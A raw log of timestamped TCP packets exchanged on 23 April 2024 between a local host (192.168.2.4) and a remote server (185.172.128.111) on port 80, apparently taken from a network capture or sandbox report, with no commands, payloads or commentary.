Apr 23, 2024 09:27:03.910640955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910669088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910674095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910706043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910710096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910744905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910753965 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910782099 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910788059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910818100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910828114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910855055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910862923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910892010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910898924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910928011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910937071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910964012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910976887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910999060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.911004066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.911035061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.911047935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.911072016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.911077023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.911107063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.911115885 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.911143064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.911158085 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.911187887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.911194086 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.911222935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.911238909 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.911259890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.911266088 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.911298037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.911304951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.911335945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.911350012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.911379099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.954360008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.160285950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.264525890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.264589071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.264626026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.264659882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.264746904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.264759064 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.264760017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.264832973 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.264837980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.264874935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.264906883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.265131950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.265168905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.265166044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.265166998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.265207052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.265239000 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.265250921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.265250921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.265252113 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.265281916 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.316185951 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.316225052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.316262960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.316293955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.316296101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.316333055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.316379070 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.316422939 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.316458941 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.316476107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.316489935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.316567898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.316772938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.316811085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.316823006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.316859961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.316863060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.316895962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.316910028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.316945076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.317091942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.317128897 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.317142963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.317164898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.317177057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.317199945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.317214012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.317248106 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.317497015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.317534924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.317553043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.317569971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.317579031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.317604065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.317610025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.317652941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.317805052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.317848921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.317857981 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.317884922 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.317904949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.317915916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.317929983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.317960978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.367777109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.367830992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.367866993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.367913961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.367948055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.367948055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.367949009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.368040085 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.368192911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.368230104 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.368264914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.368273020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.368273973 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.368297100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.368320942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.368341923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.368643045 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.368679047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.368715048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.368746996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.368830919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.368830919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.368830919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.368830919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.368880033 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.368918896 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.368953943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.368962049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.368962049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.368988037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.369000912 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.369043112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.369100094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.369136095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.369155884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.369170904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.369177103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.369204998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.369227886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.369255066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.369529009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.369565010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.369591951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.369601965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.369616985 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.369635105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.369654894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.369685888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.369765043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.369822025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.369832039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.369868994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.369885921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.369900942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.369921923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.369952917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.370304108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.370342016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.370363951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.370378971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.370384932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.370412111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.370436907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.370457888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.370572090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.370608091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.370630980 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.370642900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.370651007 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.370675087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.370697975 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.370716095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.370856047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.370920897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.370933056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.370969057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.370985985 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.371001005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.371025085 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.371047020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.371228933 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.371267080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.371289968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.371303082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.371309042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.371335030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.371357918 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.371381998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.371560097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.371597052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.371623039 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.371634007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.371642113 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.371665001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.371685028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.371721983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.371891975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.371932030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.371953964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.371968985 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.371979952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.372001886 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.372023106 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.372060061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.419980049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420062065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420116901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420119047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420116901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420161009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420162916 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420205116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420216084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420253038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420291901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420324087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420381069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420381069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420381069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420381069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420453072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420500994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420526981 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420566082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420572042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420599937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420605898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420643091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420761108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420798063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420809031 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420834064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420840025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420866966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.420877934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.420908928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.421255112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.421293020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.421303034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.421329021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.421335936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.421366930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.421379089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.421407938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.421436071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.421473980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.421480894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.421509981 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.421515942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.421542883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.421552896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.421583891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.421849012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.421901941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.421925068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.421962023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.421973944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.422003031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.422013998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.422051907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.422209024 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.422247887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.422266006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.422303915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.470506907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.470637083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.470673084 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.470709085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.470748901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.470783949 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.470802069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.470802069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.470803022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.470803022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.470803022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.470822096 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.470858097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.470880985 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.470881939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.470895052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.470906019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.470937014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.470951080 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.470977068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.470998049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.471015930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.471025944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.471066952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.472181082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.472259045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.521986008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522026062 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522063971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522099972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522135019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522171974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522197962 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522198915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522198915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522198915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522207975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522198915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522310972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522310972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522352934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522391081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522407055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522428036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522438049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522464037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522488117 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522514105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522521019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522557020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522602081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522603035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522679090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522721052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522789001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522825003 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.522871971 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522871971 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522871971 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.522872925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.523149014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.523188114 CEST	80	49730	185.172.128.111	192.168.2.4
